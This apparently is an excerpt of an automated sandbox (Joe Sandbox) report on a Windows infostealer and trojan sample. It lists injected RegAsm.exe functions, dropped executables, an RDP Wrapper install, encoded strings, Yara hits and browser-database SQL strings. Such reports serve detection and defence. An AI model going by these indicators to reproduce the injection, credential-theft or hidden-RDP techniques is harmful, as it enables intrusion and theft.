Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C142990	2_2_6C142990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C11D9B0	2_2_6C11D9B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0EC9A0	2_2_6C0EC9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C129A60	2_2_6C129A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C15BA90	2_2_6C15BA90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C152AB0	2_2_6C152AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0E22A0	2_2_6C0E22A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C114AA0	2_2_6C114AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0FCAB0	2_2_6C0FCAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C128AC0	2_2_6C128AC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C101AF0	2_2_6C101AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C12E2F0	2_2_6C12E2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C12D320	2_2_6C12D320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0E5340	2_2_6C0E5340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0FC370	2_2_6C0FC370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0EF380	2_2_6C0EF380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C1553C8	2_2_6C1553C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C26AC30	2_2_6C26AC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C256C00	2_2_6C256C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C19AC60	2_2_6C19AC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C1EECD0	2_2_6C1EECD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C18ECC0	2_2_6C18ECC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C318D20	2_2_6C318D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C25ED70	2_2_6C25ED70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C2BAD50	2_2_6C2BAD50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C194DB0	2_2_6C194DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C226D90	2_2_6C226D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C31CDC0	2_2_6C31CDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C270E20	2_2_6C270E20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C22EE70	2_2_6C22EE70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C216E90	2_2_6C216E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C19AEC0	2_2_6C19AEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C230EC0	2_2_6C230EC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C196F10	2_2_6C196F10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C2D0F20	2_2_6C2D0F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C252F70	2_2_6C252F70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C1FEF40	2_2_6C1FEF40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C2D8FB0	2_2_6C2D8FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C19EFB0	2_2_6C19EFB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C26EFF0	2_2_6C26EFF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C190FE0	2_2_6C190FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C21A820	2_2_6C21A820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C1E0820	2_2_6C1E0820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C264840	2_2_6C264840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C2968E0	2_2_6C2968E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C1E6900	2_2_6C1E6900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C1C8960	2_2_6C1C8960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C2209A0	2_2_6C2209A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C24A9A0	2_2_6C24A9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C2509B0	2_2_6C2509B0
Source: C:\ProgramData\IDBAFHDGDG.exe	Code function: 6_2_02340C40	6_2_02340C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_004103A8	8_2_004103A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00447D38	8_2_00447D38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00401000	8_2_00401000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_004480B0	8_2_004480B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00449120	8_2_00449120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0040C1C0	8_2_0040C1C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0042D250	8_2_0042D250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0040A231	8_2_0040A231
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0044A230	8_2_0044A230
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_004012C7	8_2_004012C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_004452E0	8_2_004452E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00415352	8_2_00415352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00407450	8_2_00407450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00405470	8_2_00405470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00409402	8_2_00409402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_004404AB	8_2_004404AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0044A510	8_2_0044A510
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_004115B0	8_2_004115B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0041D610	8_2_0041D610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00449620	8_2_00449620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0040A6E0	8_2_0040A6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0040B6B0	8_2_0040B6B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0043F700	8_2_0043F700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0041E71A	8_2_0041E71A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0044B720	8_2_0044B720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00428833	8_2_00428833
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_004338C0	8_2_004338C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_004408E6	8_2_004408E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_004038A0	8_2_004038A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00434990	8_2_00434990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0040ABA0	8_2_0040ABA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0042EBBC	8_2_0042EBBC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00437CD0	8_2_00437CD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00449D22	8_2_00449D22
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00407E50	8_2_00407E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00427E6C	8_2_00427E6C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_00437F30	8_2_00437F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_0042DFE0	8_2_0042DFE0
Source: C:\ProgramData\GIIIIJDHJE.exe	Code function: 9_2_00DF0C40	9_2_00DF0C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_1FC14CF0	11_2_1FC14CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_1FC166C0	11_2_1FC166C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_1FC0EA80	11_2_1FC0EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_1FC0F160	11_2_1FC0F160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_1FC19000	11_2_1FC19000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_1FC37810	11_2_1FC37810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_1FD916D0	11_2_1FD916D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_1FD6A2C0	11_2_1FD6A2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_1FD861E0	11_2_1FD861E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_1FD8FD50	11_2_1FD8FD50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_1FD8D100	11_2_1FD8D100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_1FD93920	11_2_1FD93920
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_1FD6F8D0	11_2_1FD6F8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_1FD69CC0	11_2_1FD69CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_1FD69430	11_2_1FD69430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_1FDB4FB2	11_2_1FDB4FB2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_1FD95CCF	11_2_1FD95CCF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_1FDF9F80	11_2_1FDF9F80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_1FDDAEBE	11_2_1FDDAEBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_1FDF9A20	11_2_1FDF9A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_1FDF9390	11_2_1FDF9390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_1FC98760	11_2_1FC98760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_1FCFE2E0	11_2_1FCFE2E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_1FCA9690	11_2_1FCA9690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_1FC79A10	11_2_1FC79A10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_1FCF9190	11_2_1FCF9190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_1FC74970	11_2_1FC74970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_1FC88120	11_2_1FC88120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_1FD224C0	11_2_1FD224C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_1FCF4440	11_2_1FCF4440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_1FC73000	11_2_1FC73000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_1FD28030	11_2_1FD28030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_1FC79C20	11_2_1FC79C20

Source: Joe Sandbox View

Dropped File: C:\Program Files\RDP Wrapper\rdpwrap.dll 798AF20DB39280F90A1D35F2AC2C1D62124D1F5218A2A0FA29D87A13340BD3E4

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 004047E8 appears 38 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 00410609 appears 71 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 6C11CBE8 appears 134 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 6C3109D0 appears 70 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0040CC80 appears 44 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0041D1E0 appears 164 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 6C1294D0 appears 90 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 004104E7 appears 36 times

Source: file.exe

Static PE information: invalid certificate

Source: file.exe, 00000000.00000002.1730999413.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs file.exe
Source: file.exe	Binary or memory string: OriginalFilenameVQP.exeD vs file.exe

Source: unknown

Driver loaded: C:\Windows\System32\drivers\rdpvideominiport.sys

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: IDBAFHDGDG.exe.2.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 66f5dbaca34ac_lfdnsafnds[1].exe.2.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: GIIIIJDHJE.exe.2.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 66f5db9e54794_vfkagks[1].exe.2.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: AFHDGDGIID.exe.2.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 66f5d9ab0d4c7_rdp[1].exe.2.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: AFHDGDGIID.exe.2.dr, -Module-.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 66f5d9ab0d4c7_rdp[1].exe.2.dr, -Module-.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: AFHDGDGIID.exe.2.dr, UHJvZ3JhbUFB.cs	Base64 encoded string: 'inh5L7SGzRU7sj2gmVmtk/eCneBmUqRt8FtNyXoo+5AQmk3oRrY62g==', 'ZuGslAEpNHgbGP2/CVEjxfF+g/ySUEZ1sNXmGyrGai37Z7ophpxr5kYqIxrutvNDBCvvoQkvsCw='
Source: AFHDGDGIID.exe.2.dr, QXNzZW1ibHlMb2FkZXJB.cs	Base64 encoded string: 'V3o82UX/MkW0zBr2uq1ofRWXUIfKv+li+lORUOdvw5oSTBJoZYRwd2qoeCeWckJwJoIDClvvsYSEx5KwDTmk2Q=='
Source: AFHDGDGIID.exe.2.dr, UkRQSW5zdGFsbGVyQUFB.cs	Base64 encoded string: 'OEyWuG2XpnMfaLJJ1SjuQxay2W4PlIm7ErLccCa5YXYHOaAbp1WmYvs1TACbujnFRkwG3HeI99pmebsUyUcYxg==', 'OEyWuG2XpnMfaLJJ1SjuQxay2W4PlIm7ErLccCa5YXYHOaAbp1WmYvs1TACbujnFRkwG3HeI99pmebsUyUcYxg==', 'mK/MvQHzOU0sxP54k5Qvx/lEMio9f2YK2UC9BwTiz8KREmr0zQ+O+A=='
Source: 66f5d9ab0d4c7_rdp[1].exe.2.dr, UHJvZ3JhbUFB.cs	Base64 encoded string: 'inh5L7SGzRU7sj2gmVmtk/eCneBmUqRt8FtNyXoo+5AQmk3oRrY62g==', 'ZuGslAEpNHgbGP2/CVEjxfF+g/ySUEZ1sNXmGyrGai37Z7ophpxr5kYqIxrutvNDBCvvoQkvsCw='
Source: 66f5d9ab0d4c7_rdp[1].exe.2.dr, QXNzZW1ibHlMb2FkZXJB.cs	Base64 encoded string: 'V3o82UX/MkW0zBr2uq1ofRWXUIfKv+li+lORUOdvw5oSTBJoZYRwd2qoeCeWckJwJoIDClvvsYSEx5KwDTmk2Q=='
Source: 66f5d9ab0d4c7_rdp[1].exe.2.dr, UkRQSW5zdGFsbGVyQUFB.cs	Base64 encoded string: 'OEyWuG2XpnMfaLJJ1SjuQxay2W4PlIm7ErLccCa5YXYHOaAbp1WmYvs1TACbujnFRkwG3HeI99pmebsUyUcYxg==', 'OEyWuG2XpnMfaLJJ1SjuQxay2W4PlIm7ErLccCa5YXYHOaAbp1WmYvs1TACbujnFRkwG3HeI99pmebsUyUcYxg==', 'mK/MvQHzOU0sxP54k5Qvx/lEMio9f2YK2UC9BwTiz8KREmr0zQ+O+A=='

Source: classification engine

Classification label: mal100.spre.troj.spyw.evad.winEXE@63/43@16/14

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_6C147030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

2_2_6C147030

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_004114A5 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

2_2_004114A5

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_00411807 __EH_prolog3_catch_GS,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,FileTimeToSystemTime,GetProcessHeap,HeapAlloc,wsprintfA,VariantClear,

2_2_00411807

Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe

File created: C:\Program Files\RDP Wrapper

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5348:120:WilError_03
Source: C:\ProgramData\AFHDGDGIID.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6568:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5296:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3740:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2860:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6432:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:980:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1136:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6480:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5012:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6660:120:WilError_03

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File created: C:\Users\user\AppData\Local\Temp\delays.tmp

Jump to behavior

Source: Yara match	File source: 19.0.RDPWInst.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.RDPWInst.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000013.00000000.2436607215.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2487557862.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, type: DROPPED

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: file.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: RegAsm.exe, 00000002.00000002.2510766447.0000000031BEE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: RegAsm.exe, 00000002.00000002.2575641703.000000006C31F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.2471362906.00000000199DC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2530480824.000000003DACD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2485834925.000000001F948000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.2.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: RegAsm.exe, 00000002.00000002.2510766447.0000000031BEE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: RegAsm.exe, 00000002.00000002.2575641703.000000006C31F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.2471362906.00000000199DC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2530480824.000000003DACD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2485834925.000000001F948000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.2.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: RegAsm.exe, 00000002.00000002.2575641703.000000006C31F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.2471362906.00000000199DC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2530480824.000000003DACD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2485834925.000000001F948000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.2.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: RegAsm.exe, 00000002.00000002.2575641703.000000006C31F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.2471362906.00000000199DC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2530480824.000000003DACD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2485834925.000000001F948000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.2.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: RegAsm.exe, 00000002.00000002.2510766447.0000000031BEE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: RegAsm.exe, 00000002.00000002.2471362906.00000000199DC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2485834925.000000001F948000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: RegAsm.exe, 00000002.00000002.2510766447.0000000031BEE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: RegAsm.exe, 00000002.00000002.2510766447.0000000031BEE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: RegAsm.exe, 00000002.00000002.2510766447.0000000031BEE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
